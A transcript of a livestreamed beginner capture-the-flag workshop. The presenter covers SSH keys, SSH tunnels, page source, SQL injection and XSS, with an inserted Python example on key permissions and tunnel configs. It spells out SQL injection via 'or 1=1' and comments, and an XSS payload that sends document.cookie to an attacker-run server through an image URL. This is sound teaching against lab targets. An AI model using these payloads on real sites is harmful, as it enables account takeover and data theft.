No. So stop talking nonsense from now on. Olivier should be here before long. Florentia, I think she thought she was talking to you on Discord, but it wasn't you. That can be pretty confusing. The top nail to date, it's just face on. You're going to become a star. Yeah, that's it. I can't wait to put up a better background, like you in a ballroom in a palace or something. Still time. So I'm going to make you host. You're host now. You have all the power. Me. I'm waiting for... Olivier to arrive... Ah well, basically. No, I can't do anything anymore. You have the power. You made me host. Do you have moderator rights in Discord? I think they don't give them to me because I don't have everything. Can you turn it on? If I need something, I could do it quick. I'll monitor your chat, no worries. We'd just need to create a text channel for... It's already done. So I can reply to messages, but it's true that I couldn't, like, moderate. But I can do it. OK, if you can do it, that's very good. If there's really something to do, I'll tell you. I'll try to take care of it. Bilodeau is in the waiting room. You can admit him. Hi hi. Camera 2. The little camera, that's all. It's the work cam, it's not my good cam. For the lost day, I haven't got my leg back yet. Hi Colin, thanks for being here. Not at all, my pleasure. I'm going to want you to check... What I'd like you to check is Discord, not the CTF channel, the general workshop one. Because basically, we show it on YouTube, we don't have the CTF workshop channel. I want you to check that. Slack too, I don't think I'll check Slack during the whole stream. If you ever see something, warn me. Just so you're not surprised, basically, the format is, there are no slides. It's me solving 12 challenges in 3 hours.
It's not hard, I practised earlier. I'll go slowly, I'll explain, I'll give a lot of detail on the theory, the commands behind things and all that. I'll try to track the time and maybe go faster in some places, depending, but I'm going to start really slow, because I still have plenty of time. And things that are really easy. You know the timings. I'm not sure I have access to Slack. On that thing, I'll check for 2 minutes. I don't think we receive anything. The Slack is our site's, the organization's. Basically, Hugo, are you there? If there's ever anything... Arrange for it to come out on Discord, because, that's it, Slack, I don't check. Yes, that's fine. Now I'm going to try to write and not like my Fnites and all that, but it's hard. And then, also, could you, Colin, put Olivier as crowd, just to be sure. Now I'm going to start sharing my screen. Yes, I'm sending it in 1080p for that. Wireshark, that's not what I want to do. That's a bit annoying. I'll see it in Chromium. Ah, why do I always grab everything if you're not really there? That, OK. It's not there. No, I'm not putting the stream up. Then, let's say... That too, I can close that. Then if I do this, perfect. I think I'm ready. The stream is started. It's unlisted, but you've started getting people on the stream. Cool. Fantastic. Now you're going to let people in too. I wanted to take part in setting up. Ah no, OK. We can do admit all. Yeah, you, I didn't put you in right away. I'd need to make sure you're ready. Yes, I look like I'm not started. There's the... The bonus that I'm not proud of my explanation of, but I may not get to it. It'll depend on time. But the rest, that's it. It's exploit, yes. There's noise. If I land on the bad one. The weather's really nice, if it were NorthSec in person, word. Yeah, beautiful Ottawa. Yes. That's not annoying.
Ah damn, it's still in the blood, in the Ordin verse. Wesh. Wow. How is Jean Julien? Who sent me that? Who's lowering. That's good. I'll send a message. Oh, I didn't do that message. Where are you? No, I'm running. Oh no, I have to press to see the chat. How does it work? Chat! There. OK. Everyone, I'm waiting room. OK. Hey, every time that pops up, it's going to be funny. Seriously? It's fucking annoying. OK, I think when we restart, maybe it'll be less bad. Hey, we're going to close that. Seriously, the annoying bar, there? That's weird. I did a Zoom meeting Tuesday, and I didn't have the same options, and it was the RSA Conference licence, it looks like. It was on Zoom. Yeah, it's weird. Maybe you weren't co-host, otherwise I don't know. Yes, I was co-host so I could share my screen. Anyway, no big deal. Ah yes, also Colin, another thing. Sometimes, when I have windows on top of each other, I start getting glitches in my display. If that ever happens, tell me, I have a workaround: if I go to a window with nothing in it, it doesn't do it. It's the kind of thing, it's when I have maybe a browser and another thing where I go in the workshop, often it's my terminal that shows through the window of other things. You just do like a new talk and it just does badly. And also, I remember, but we don't see the chat through your screen. Yes, I know, it's cool anyway. It's special, it's well done. She put my sister in workshop. We're already live, that's what it says. It's stressful. Am I spotlight? Yes, I don't think you have the spotlight, but since you're sharing your screen, I think automatically what they see is only your screen. Oh yes, the windows came out, it's weird. That's not why I didn't wait for it. OK, everyone. If you want, I can let everyone in. Yes, please.
Yes, that's it. I hope the glitch bar will disappear when we start admitting people. Give it time. Oh, you admitted everyone. Well, you have to give it a little time. It's 6 p.m. We'll start, I think. Hello everyone. I'll do it. Everyone needs to join CTF 1-on-1.insect.io. I'll send it in the chat. Everyone in the meeting. This is what we're going to do today. We're going to do a play-through. There are lots of difficulties. If you don't feel like listening to me, feel free to do that. All you have to do is be working on the challenge. I advise you to start from the bottom and work your way up anyway. So, we'll start with sysadmin, because you'll have a system that you use in the web track. And then forensics, and then reverse engineering, but it's not hard. The problem with the thing is that people in addition are everyone. In Chrome, everyone has used the developer console. But not necessarily. Everyone has opened the binary in Ghidra. That's why we're keeping that for dessert. And there are tax preparations and exploitation experiences. We can't do it, we can't do it. It depends on where we succeed. We get along together. Once again, the way it's going to work, some of you have already started. This time, I decided, I'm going to keep the scores at the entrance. Everyone can play. What I'm going to do is I'll be able to do all these things. And I'll give a lot of theory, a lot of explanations so you can build an understanding of the thought process, or the simple challenges. And I hope that when you face a harder one, you'll have the basics so that you can have, at least, a small hook, or a bit of assistance.
And the sysadmin one is really just the basics of what you need to understand to access that system. At NorthSec, it's IPv6, so it's a bit harder. But it's something that's necessary, going forward, to understand that for the XSS payload, often, you need a host service in order to serve the payload. Before starting on the first challenge, I just wanted to say that for CTF, everyone needs a muse, so you need something that inspires you or something that's going to keep you engaged. And for us, we started with very bad habits, our muse was alcohol. So, what I learned over the years is that there's no quantity, so what we'll try to achieve here is to reach the Ballmer peak or to maintain the Ballmer peak, so I'll show you what I learned for the Ballmer peak for CTF. It's very important because productivity is at a specific level and I have a very strong IPA so we're going to go smooth and, you know, at some point give you the possibility to find your own muse, not because it's the main one but it's the one from the address part, so it can be lots of other things, but you have to keep your hand, it's not possible for you, I was doing that and here we go. The first challenge, SSH. OK, 10 solves already, so 10 people are faster than me here. The ability to use SSH is an important skill for a CTF player and anyone in the security field. So, it should be very straightforward. We're going to do the CTF 101 workshop. We're going to destroy everything I have here so we can start from scratch. But here we go. Can I make that bigger? I have profiles for that. It's maybe a bit too big. I think for everyone who is on their computer it's better to present it than in person, where it's on a screen.
But I'm still going to go with the presentation in case someone is watching this on their TV. Now, we have access to two files and we have a good hint. So, port 2222, hostname. We're going to download the keypair. My little folder that I have here. So, we'll name it with the track name, sysadmin, and then we're going to download the keypair. We have instructions. So, hostname, a specific name, let's copy it. User and port. So, for SSH, you know, the help can always help, but we can use the following text. So, it's user and at. And then, since SSH is a protocol, it's very important to remove the HTTP, colons, etc. It's... What we connect to is the hostname ctf101.io. And for that, we specified the port. So, we need to do a dash p 2222 in order to specify the port. And so, what SSH does is it combines several channels that are useful in order to do network interactions and get access to the TTY, the terminal environment, of a remote system. So, now, we're just using the basics. I want to get a terminal on this host to authenticate with this user. And the key we downloaded is something, some secret that was created by the service administrator that he sent to us. So, that prevents the use of a password. And since there are keys, you know, our files, they appear to have much more entropy, much more random than usual passwords. And it's also a good measure because users can create passwords that can be brute-forced. But when you enforce key login, you've basically raised the bar. You had users settling on something simple. Now, I'm going to deliberately not use a key and we'll see what happens here. So, oops, I already connected to that and there was another IP or another key.
So, we'll just laugh that off. Let's start again. So, the way I've configured it is that I always print that key, a visual key, just so I get reassured that it's the same key and it wasn't compromised. It's a setting I copied probably from Pierre David or someone like that, that I created, but you won't see it after the first connection, I think, but for me, it's on every connection. To be honest, it's not that useful. So, since I didn't specify the key, it asked for a password which I don't have. So, I can't connect. Now, how I specify the key is by using a key and then I'll specify the key over here and with that, now, we, oh, we have another error. How did I not get the other error? All right. So, it says, your private key is badly protected, so protect it in order to be able to connect. Right. And the permission 0644 is too open. So, we need to apply different permissions. So, we want to see the permission of the file I just downloaded with ls. So, OK, of course, the file is world readable. Right. The dash, the r, that means everyone can read this file on my system, which ssh doesn't like or doesn't want you to behave like that. So, I'm going to show you the symbolic use of the permission. I know a lot of geeks out there are proud of the fact that they know these permission bits by heart from the octal. But, I don't know. And I think the world would be better if you didn't have to remember something like that. So, we're going to do it symbolically and the syntax is a bit nasty. So, what we're going to do is a bit on the file, so, what we're going to do is we want to say that the user is going to have access, groups and others have no access.
So, we put u dash rw and g o, so groups and others have no access to anything. And we apply this to the ssh file and with this I have to, I used, so I used this to change the ownership instead of chmod, so, of course, u equals rw is not a user, thanks, now it's better. If we look at the file now the permissions are something that only my user has access to, and the group permissions could arguably be stricter since I'm the group, the group is the second name you see here, but I don't think ssh enforces or checks for that, so just use the thing here and you'll be fine. So we'll try again, so we're connected, we're connected on a system called pivot box and at any time you're looking for a flag or working on a specific challenge you always need to look around, so where am I, what are the local files, I have a flag.txt, OK, that looks like something I'd like to read, and so if you cat the flag you have a message saying congrats, learning to use ssh and ssh keys is a very important skill, so let's copy that and see if we got it right, and it worked, and that's the key and the format here for people who are on Windows and want to use PuTTY, but I'm not going to show it that way, I find that what we're going to do later is more complicated with PuTTY and also file transfers are harder to do, they're not as straightforward as scp. We're not going to do file transfers today but you should know that ssh also supports file transfer channels which are very useful. So we're good, we did our first solve, moving on to, oh, we can read the, moving on to two, SSH tunnels. So from the pivot machine, pivots, you can reach a service that
exposes a secret elsewhere. pivots pivots have left many tools like nc or socat, maybe we have to use an ssh tunnel to reach that service. So here I want, I want to do a little something because I'm a teacher at heart, so this is us, this is pivots and this is the ssh service, wait a bit, yes OK yes, so pivots service, I can't, I'm not using a diagram program so it's going to look like this a little bit, hop, the first time I enabled this tool it's slow, I have too many fonts or I have, oh no it's my selection, I need to select all the things and then I have a service, OK. So what's said in this description is that we're not going to be able to connect to this service directly, it's not possible, it's not exposed on the internet, so what we have to do is find a way, and in fact there are many ways to solve this challenge but the learning I want you to get is, uh, ssh tunnels. So what we're going to do is create this tunnel and it's very important to understand what happens when you create an ssh tunnel. Basically it's a virtual tunnel that's going to, I should, I should probably do this through the box, and then we get to today's spot, and you can do a forward tunnel and a reverse tunnel, it's different and it's important to understand the difference, you can, you can escape lots of different network configurations with ssh, it's incredible. But so at the, at the base layer you still, you have a tcp connection here and then one here, what's going to happen is at the layer, the system, and this is created on the fly, it's not always done, but so let's say tcp, tcp up, but so inside this layer is where it happens, inside this ssh tcp connection on port 2222 is this capacity, this tunnel created between the two different systems, and so here we are, we
want to reach a service on port 5555, so we're going to, we're going to poke here, we're going to plug our tunnel into 5555, and so then what we specify here as, as listening destination, and it can be a different host, so it's important again to understand, you know, the best possibilities of an ssh tunnel, but so you have to specify where it is and when we send it into the layer, so it's just, it's just, it's just that this tunnel source can be specified and when we send the packet into it, it's going to automatically show up here on 5555, OK. So with this theory in hand we're not going to follow any advice and do a try from here to connect to a service, that is, a service, OK, so ping a service, that works, we don't have ping, that is, that is, we, that's the case, and if we look it's not there, it's not there, OK, this system was very restricted, of course there's Python so you can probably do a one-liner in Python and do it but that's not the purpose here, so we're going to, we're going to, we're going to build the thing and create this tunnel. So I'm going to show you two ways to do it, I'm going to show you the, the, the command line and then I'm going to show you the config way, because it's, it's useful to be able to use the configuration to do this because you don't have to repeat the same commands over and over. So OK, knowing what we saw, we'll, we have to mentally thank this command forever, so the tunnel, that is, capital L, OK, and we specify which host we want to reach on the other end and the, the port, OK, what's involved in here, OK, we'll just take a look at the ssh output, so that's the address, so we'll then look at the page with capital L and OK, so we have here a port, host and host port and we, we can specify a bind address, OK, we have port and a socket to thank and local sockets too, so local sockets, I assumed it's socket files but I'm not sure, maybe
it's the existence of named sockets, but what we're going to focus on is this one here, so host port host, that is, the other way, the other way, and that's what's important to remember when you do this, that is, the L command, that is, your ssh, you're still, that is, that is, for this you still do this ssh to this system, this system lets you do the tunnel, so you don't change your regular ssh arguments, that is, a trap that lots of new port-forwarders have fallen into. But so host, host port is in the L command and then local port or port, and what's, another thing we don't want to use but that exists and that can be fun is a bind address, so you can, if you have several IPs on your machine, bind another address, and you can bind an address which means it exposes the tunnel to other systems, by default they'll bind on localhost, so if you work in a team and you do the tunnel and you want others to connect you can always use a strategy like that. But so now with this in mind we're going to do this system, this service, and on our system we're going to use the same port, just mentally easier, and then connect this system and the service and we'll see what it does. So another interior, interior, actually, of creating this tunnel is that by default it's, it's an ssh connection, a regular ssh connection, but behind the scenes the tunnel exists, so we might think it failed or something's not working but it's, it's, it's, it's, it's, it's, if we have another shell and we, with netcat localhost, I think I could use the names, and then 5555, we, we have the tunnel working, we, we, we, we just netcat queried on localhost 5555 but it went through the pivot box and it reached that 5555 on the other side and we have the flag now.
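The two SSH points above, the "permissions 0644 are too open" error on a downloaded key and the order of the `-L` forward specification, as an added example that is not part of the stream or of the CTF 101 material. It is a Python script: the first pair of functions reproduces ssh's group/other check and the `chmod u=rw,go=` fix on a constructed throwaway key file; the second pair parses a `[bind_address:]port:host:hostport` spec and renders the equivalent `ssh_config` stanza with `LocalForward`. The alias `pivot`, the user name `player` and the identity path `./key` are placeholders; only `ctf101.insect.io`, port 2222 and the 5555 service come from the stream. Hostnames containing colons (bracketed IPv6) are not handled.

```python
"""Added example (not from the workshop): SSH key permissions and -L specs."""
import os
import stat
import tempfile
from typing import Optional


def key_permission_problem(path: str) -> Optional[str]:
    """Mirror the check that makes ssh refuse a private key: any bit set for
    group or others (exactly what `chmod u=rw,go= key` clears) is 'too open'.
    Returns a description of the problem, or None when the key is acceptable."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & (stat.S_IRWXG | stat.S_IRWXO):
        return f"permissions {mode:04o} are too open"
    return None


def fix_key_permissions(path: str) -> int:
    """Apply the symbolic `u=rw,go=` from the stream as the absolute mode 0600
    and return the resulting mode bits."""
    os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
    return stat.S_IMODE(os.stat(path).st_mode)


def demo_key_permissions():
    """Create a constructed throwaway 'key', loosen it to 0644 like a freshly
    downloaded file, run the check, fix it, and check again."""
    fd, key_path = tempfile.mkstemp(prefix="ctf101-key-")
    os.close(fd)
    try:
        os.chmod(key_path, 0o644)
        before = key_permission_problem(key_path)
        fixed_mode = fix_key_permissions(key_path)
        after = key_permission_problem(key_path)
    finally:
        os.unlink(key_path)
    return before, fixed_mode, after


def parse_local_forward(spec: str) -> dict:
    """Parse an ssh -L argument: [bind_address:]port:host:hostport.
    The order is the part people trip on: the LOCAL listening port comes
    first, the destination as seen from the ssh server comes last."""
    parts = spec.split(":")
    if len(parts) not in (3, 4):
        raise ValueError(f"bad -L spec: {spec!r}")
    if len(parts) == 3:
        parts = ["localhost"] + parts   # ssh binds the loopback address by default
    bind, port, host, hostport = parts
    return {"bind_address": bind, "port": int(port),
            "host": host, "hostport": int(hostport)}


def local_forward_config(host_alias, hostname, user, port, identity_file, forwards):
    """Render an ssh_config stanza equivalent to
    ssh -i <identity_file> -p <port> -L <spec> <user>@<hostname>,
    so that `ssh -F <file> <host_alias>` reuses it without retyping."""
    lines = [f"Host {host_alias}",
             f"    HostName {hostname}",
             f"    User {user}",
             f"    Port {port}",
             f"    IdentityFile {identity_file}"]
    for spec in forwards:
        f = parse_local_forward(spec)
        lines.append(f"    LocalForward {f['bind_address']}:{f['port']} "
                     f"{f['host']}:{f['hostport']}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(demo_key_permissions())   # ('permissions 0644 are too open', 384, None)
    # Placeholder alias, user and key path; hostname and ports from the stream.
    print(local_forward_config("pivot", "ctf101.insect.io", "player", 2222,
                               "./key", ["5555:service:5555"]))
```

The `IdentityFile` value is emitted as given; as the stream points out later, a relative path only works from the directory that holds the key, so an absolute path is the safer choice when the config is shared.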
There are ssh commands or switches to avoid getting that shell, to signal that this ssh shouldn't be used for tty interaction, just for the port forward, that exists, I think it's dash n, lowercase n, and I don't know it by heart, but another cool trick I want to show you is in the session, and I'm going to show you how to make a config file, I'll be able to say it, I didn't rehearse that part, capital F config file, that's it, OK, we'll try. So what I'm going to do now is create a config file, so we'll call it pivot box and then the hostname, I should rehearse that, it's the identity file and then we could use, it's the ssh key, that, and then the user is the user, the hostname is ctf101.insect.io and then the port is, OK, we'll just try this, so if I do ssh config pivot box, it doesn't work, too much going on, and why is it all my keys, oh my God, so many keys, why isn't it, it doesn't work, is it maybe because the file name isn't wrong, try that, I'm not going to take too much time on this, or is it close, but that's it, so you can read about ssh config by doing a man ssh underscore config, and so host is correct, identity file for the path, that should be correct, OK, so, so that was a mess, I think I'm going to move on, but what I wanted to show here is that you can also, rather than the dash i, the dash capital L for the port forward, you can use a LocalForward specification and so that lets you do your port forwarding in a, in a consistent fashion, and so you use the same syntax as usual, and the reason I'm doing this in a separate file is that I don't want to open my ssh config, my personal ssh config on the stream and on YouTube because it's a bunch of hosts I don't want people to be, so that's why, but I
think there's probably a fallback that affects this in my config and in specifying just what it does, but so the LocalForward is, it's nice because it's a self-documenting thing and you can, you can put many of those in a single command, so it's nice for documentation and it's easy to share, for you, you can just share the config and people can connect, so I'm going to use this more and more for, for people to be able to connect to, I think someone blocked the server, is that possible, no no no no no no no, it's because I used the wrong one, OK sorry for that, the mess, I, I switched folder and I, I used the wrong one, OK, so I'm going to grab this flag, it's the same as I did before because I wanted, because I wanted points, but the config got used, the advice got used, it's a very good way to remember how to use, how you remember, and just keep configs around without having to start from scratch. So here we go, we have someone who says he can't do the tunnel, do you want, do you want, we can, where are you, can you meet, username, we can maybe unmute you, I can unmute myself, oh even better, yes, so the setup is Windows with an Ubuntu WSL, I can assist using Windows but not the tunnel, and on Ubuntu it's still complaining about permissions, are you OK, so the permissions, I'm not sure how to fix with WSL, I've never used WSL, but it's chmod, the thing I talked about should work, no, chmod chmod, even with sudo it tells me I don't have permission, you don't have permission to modify the file, yep, no idea, so I did it in Windows, the file has to be in WSL's file system, otherwise if it's on like the Windows file system the permissions don't work the same, so if I check the permissions in WSL the file is from the suite, so we have other questions, so
the file shouldn't be from the suite and it shouldn't, I, I unfortunately can't help with WSL, I have no idea how it works, but, but SSH will complain if the file is broadly available, and do you have to fix that from WSL or from Linux in WSL? Unfortunately I don't know, what we're going to do here is we're going to have people who got it working in WSL mention it in the chat, either in the Discord, the main workshop channel, or in the CTF 101 channel, if someone can do that, please, that would be nice, otherwise we can look after, after we're done with the other challenges. Sorry about that. OK, so moving on with the web challenge, so this one is Use the Source, Luke. Right, it's a pun that has been made in countless capture the flags before, and the idea here is you need to know how to poke behind a web page and see the source, and it's going to be fairly straightforward, but first, the rewards... oh, there's one important thing about the SSH, make sure that you can see it. So for example notice how I moved around in the file system to make sure that the file was local, right, was near where I run the command. So for example if I do this here, the file is local in my current directory, that's good. If I run ssh from here, the file is not here, it's not in my local directory, it's in the sysadmin folder, so what I need to do then is to put the full path to the sysadmin folder, and this might be one of the issues with WSL, not sure. All right, so Use the Source on the web challenge, you can see that you can log, it's a login page, but, and this is a good reason why you need to pay attention to the challenge description, and every year we catch people with stuff like that, the description of the challenge gave a very strong hint, because otherwise you could try to do SQL injection right here, right, and you know, get a login fail and then say oh, it's probably blind SQL injection, and then just go crazy trying to solve this with SQL
injection whereas the description said use the source so you often time if you've been hurting yourself on a challenge for an hour or something like that take a step back you know breathe talk about the challenge to someone but make sure to to get perspective on it and and reread the description maybe there's a there's something you you didn't quite get and and oftentimes you know the when you explain it to someone then you'll have you might not find the solution but at least you'll have ideas like oh I didn't try that and and you this happened countless times right so but now having reread that description use the source we could use the view source button or the inspect view both actually work this one actually leads quite straight to okay to do disable the support account and then after all the form you get if you if needed support account is support welcome to so we're gonna try that and many of the harder challenge have elements like that so even though this is not the super crazy web challenge a few of them including past north sec ones have these stages right where you oh you would get something out of this or access to a page you shouldn't have access to stuff like that also note that one of the the CTF I played in they used this very similar trick but they put a bunch of new lines and now now chrome has the line numbers but it there used to be a time where they didn't or it will open a notepad and you would basically have 5000 empty lines and then at the end you would have a comment like that you know this is CTF this is not the reality they can do stuff like that to mess with your head and this doesn't necessarily makes it a bad challenge it's just you know use your brain and one of the way of picking it up was that there was a scroll bar you would you would see a scroll bar on the on the right okay up hidden account activated here's your flag we're doing good okay sql now more we're gradually approaching harder and harder challenges so sql what what what 
what what is this page what does it do let's let's just run a test oh nice they do output the sql that was executed how kind of them but uh keep in mind that even if if it's not the case when you approach an sql injection challenge you need to think like that and you you even should in in the harder cases deploy uh my sql or as soon as you know what they are using deploy one locally and play with it try like the commas and stuff like that that the the reason is you'll get the error message you'll be able to go quicker iterate quicker on different inputs and see what does an error what what is you'll see also if there is something in between at the application level that filters character or if it's the database layer that does that so it's uh it's very important to be very methodic about sql injections also you know solving them with a tool is kind of rare in CTFs it it it it can be done and it happens still but most of the time you know they will make sure that the tools don't work so so going by hand and methodically is often better so let's assume we're we're we're you know not too sure so we'll do like the okay Bobby tables or one equals one oh we get something someone put in or one equals one in the database to just troll us that's not kind okay now let's look at the query like percent or one equals one percent we probably okay so percent clearly does something special here so let's say we put one equal aha we get two results so this clearly acts as a wildcard and many programmers already knew this but so you have a wildcard but it was started with a double quote so can we do another double quote let's see we're crashing the php application so that's not good so we need to find a way that the that the query will still be valid SQL one of the common tricks is let's do oh we can we could search for flag as well I forgot we should have done that flag nice try okay so let okay let's then do flag and then close the quote but not having crash so we did flag close 
...the quote, it crashed. What could we do? We could continue the SQL query, and this is where you get these `or 1=1` type deals. The goal is to short-circuit the Boolean logic: a false will be OR'd, will be checked against a true, and so the true will win and you will get all the results. That's the idea of the `or 1=1`. Another way that we could terminate that query properly is to comment out the rest of the line. The SQL language has comments, in many flavors, so again it's important to check your database, fingerprint it and understand what is going on, but doing space-dash-dash is one of the common ones. There's also semicolon-dash-dash, or semicolon-space, stuff like that, and I know that the spaces are important for some databases.

So what we have here is: it worked, right? We didn't get the flag, but we had valid SQL, so that's great. We can see that it appended a person and a double quote, which should have failed the parser of the query, but it was commented out, so the dash-dash did work as a comment. Now that we've built this, let's apply this Boolean logic. What we want is something false OR something true; `1=1` is always true. Then do a search and boom, we drop the whole table, by doing this double quote, `or 1=1`, and then commenting out the rest of the query so the query is valid. You can see that the challenge designer played with us a little bit, because they use non-ASCII characters here, and even in the description they're using this Unicode flag fancy format. The NorthSec challenge designers are world-renowned trolls, so you can expect something like this going on.

There are other ways to solve that challenge, many other ways, so I'm going to show you one that is fun, and this was discovered as I was presenting it. Let's do "test" again. If this person is a wildcard and "test", then nothing prevents us from submitting a wildcard. So it could be wildcard, wildcard, wildcard. Does that work? Yes, it does. So you can dump everything like that, as simple as that. There are oftentimes unintended ways of extracting flags, finding ways around like this. Now, do we have another one? No, because it's the name column of the items that has a LIKE, so we could maybe have found the J character or something like that, but for our intents and purposes let's move on to the next challenge, which is XSS.

So XSS. I think for people younger than me XSS is easy to grasp, but I remember the first time I was exposed to XSS I was really confused. I was like: they're not attacking my server, they're not executing code in my server context, how is this a problem for me? Well, the problem is not necessarily for you but for your users, who are getting their secrets stolen. So, oh my God, can I really get into XSS? OK. So HTML... oops, I'm not ready, let's be gentle. An HTML page is a mix of HTML and code, JavaScript, and that code has access to many of the secrets stored in the browser. Browser secrets, OK. So that code can access stuff like here, right, and cookies are the top browser secret. If you can access the cookies of a user, basically you can copy or impersonate that user, so that's pretty bad. You can also, with JavaScript, generate other requests to other web pages. So this is pretty powerful and dangerous. It's probably the web's biggest mistake, but at the same time, how could it have worked any other way? I don't know. It's difficult to talk about the past like that, but we're stuck with it. What XSS is, basically, is a way with user input to mix the two together: what should have been HTML, the user submitted JavaScript
instead. This is where the diagram gets messy, but the user submitted JavaScript instead, and so code is executed. But at the root cause is badly sanitized user input. Root cause, OK.

So if we take this into our example: it's a search box, OK, so we're going to search for "flag". I search for flag, no flag. Ah, damn it. I'm going to reread the description: "Can you XSS yourself? Important: your payload must return..." I don't want... all right. So this is user input, yes, and this is HTML, so this user input is returned by the server and is now page content in the HTML context. Interesting. Is there any filtering happening? Can we do pure HTML injection, or HTML entities injection? OK, so you see, I submitted HTML entities and anchors, and they were reflected on the page, and now I see that the bold is there.

So let's get back to what JavaScript is: JavaScript is code in the browser, with the HTML. How could I generate such code? We can try by using `<script>`, and then let's do a benign payload, a non-alert payload, let's not go straight to the answer. document.write: does such a method exist? Thanks. So yeah, document.write. Let's try that. Are we really executing code in that context, or is Olivier messing with us? Right. So document.write, and let's put "coucou", or not coucou, it's too French, "hello", and then let's save it. Oh, "you searched for hello". So what happened here? This was written like "hello", but what do we have in the page? Ah, we have a script that said write "hello". Interesting. So it means that here we could have this browser request stuff from other servers, and of course there is the cross-origin policy, the same-origin policy, that prevents many attacks and mitigated the biggest problem of XSS, but we're still executing JavaScript, and now it's all about imagination, having it exfiltrate or do our bad bidding in various ways. But the point is, I hope you understood what XSS is and why it's dangerous.

Now we're going to do this flag, and then on the next flag we're going to crank it up a little bit on the XSS, because self-XSS like this is almost never a CTF challenge, but you'll see the next type of XSS is. "Your payload must contain alert(1)", so let's do that now. Again, `<script>alert(1)</script>`, and oh, I get a pop-up, so the code executed in the browser, I get the 1 and "congratulations, you XSS'd yourself", I have the flag. I'm just going to open the window. One... or is it warmer outside? I don't know, to be honest. Maybe I'm making a mistake. OK, so this is solved, let's move on to XSS Larry. Let's take the sip of victory.

So here we're dealing with a different type of XSS. Six solved already, that's cool. So, Larry the Clicker. We have a URL to look at, let's close this and this, OK, same search box, excellent. We can submit URLs for Larry. So basically, who is Larry the Clicker? Larry is someone to whom you send URLs, and he clicks on them. That's cool. So our goal is... let's open Larry the Clicker: "please give me a URL and I will visit it". Excellent. So the goal is to steal the browser cookies from this domain, from Larry. Basically, Larry has a secret in his browser cookies. For this we will need an accessible web server, because, and this is another very important concept of XSS, you're executing code in the browser of the victim. So wherever Larry is, if you want to put code that will exfiltrate, that will send the secret somewhere, that somewhere needs to be reachable, so it cannot be your local machine. For CTFs you often need a box somewhere that is easily accessible. Pro tip, and maybe I shouldn't say this, but NorthSec is IPv6 only, so maybe you should get IPv6-reachable hosts on the internet. We do, I think, have NAT64 capabilities, but these rely on DNS, so if you don't have a DNS name associated with your IPv4, you're going to have a problem reaching your server. So always do a straightforward test
before going into more convoluted things, because at NorthSec we like it hard, so everything is IPv6, and you know, it's 2021; people were saying IPv6 was dead in 2014, I think, or maybe even earlier than that.

OK, so we can use the pivot box for that. We'll go get on that server, and that server is reachable from the internet, or at least from Larry the Clicker, and so if we have this in the payload we will see it in our logs. But first, OK, the thing is we are giving a URL to Larry, so the method that we need to use here is... OK, cool, but it means that I should be able to access myself, but only using a URL, and send this to a local server. So this should work; that's how we're going to build the payload. So first, that's probably what we're interested in. Let's run this and we don't see anything. Maybe we don't have cookies. Let's try... can we... OK, is there a cookie management here? Cookie. We do have a cookie, a session cookie. No, maybe not for this. Did this work? Oh, or maybe... come on. Let's try that. Maybe no cookie. OK, no cookie. Can we assign it something? Will that survive a refresh? Yes, it did. What? I didn't expect that. OK, so we have a cookie, a test cookie with no content, and maybe that's not right, we'll troubleshoot it later.

What we want is to send that cookie to a third party, to our local web server that we're going to run now. To do that there are several tricks, but creating an image is one such trick that works really well, because images can be hosted on different servers and you can construct their URL by exfiltrating secrets in them. This is kind of a legacy of the web. So one way to exfiltrate data is to leverage this image creation pattern. Let's search "javascript create image". How can we do that? I don't want to use that. Can we... OK, that sounds good, and then it appends it to the body. So I'm creating this, and then image source. Image source is going to be localhost on port 10000, because why not, and then a.gif plus document.cookie, and then we need to inject it in the body so that it will be visible, right? So let's steal this line of thunder. I could have mixed HTML and JavaScript, and I was doing so before, but the problem is you quickly enter the realm of needing to nest your single quotes and your double quotes, and this gets super hairy and you have bugs and you can't figure out why. Actually this strategy is stolen from François Proulx, after he saw my first solution to that challenge, which was very convoluted and involved encoding everything as characters and evaluating them with JavaScript, which was poor taste. Oh, and something you should also always do, that I haven't had the discipline to do, is take notes all the time, especially for payloads like this that you could lose with a copy-paste or with a submission. So I like the AsciiDoc format, but here I'm going to paste this here, so if I lose it I can get back to it.

So, oh, nothing happened. What does this look like? "Cannot read property appendChild of null". I do have a body, so what was null? getElementById body: I don't have that. Do we have something with an ID? No. Is there such a thing as document.body.append? OK, let's do it like that. The console is super helpful as well to understand what you're doing. So let's get back to our payload and copy it, because we're working on it, and then here we can avoid this and just do that: body. And it should work, maybe. So you notice that I haven't started a web server, so what I kind of expect is the result in the JavaScript, but "file not found" or a broken image. Here we saw a broken image appear: connection refused. So we haven't stolen... oh, that's not JavaScript, I made a mistake. Yeah, I included the document.cookie statement inside the image source string, so that was a mistake. This is better. And now I'm going to start
the server so I'm gonna copy this and then let's do a python http.server and then 10000 server is running let's paste that here so I'm gonna walk you through it okay so we got what we got is a get request on a.gif and test right after okay so it worked from our perspective now we need to have that executed by larry but let's tweak things just a little bit I will add a question mark here inside the the string because it's gonna be easier to see where the cookie starts right okay and we're gonna save that in our documentation so okay um okay let's let's go through that payload again together so that we are we understand what's going on here okay I'm gonna I'm gonna indent it so it's simpler as I explain it let's not do that okay so we're creating an element an html element in javascript we're assigning it to the variable image we're modifying the source property of that image so that it refers to something web server that we control this web server happens to be localhost because right now I'm testing on myself on port 10000 which I ran on the side and I'm appending on the url I'm appending the contents of the document.cookie and then this would not be alone enough on its own because if the image element doesn't exist in the DOM the browser will not the DOM is the document object model and it's basically what you see in the in chromium's inspect view this is a DOM view where all the nodes are kind of nested nicely and and let's say you do something stupid and the browser does something to figure it out it will be figured out in that view whereas source is what you got as is right with the mistakes and the bad indentation if it's the case so what this does is inject in the DOM this image variable that we created and this makes the browser see oh I have a new image element I need to fetch it and this is the url and it doesn't ask any question it just fetches it so this is what happened now let's take the payload and adapt it to the context of the challenge so we cannot 
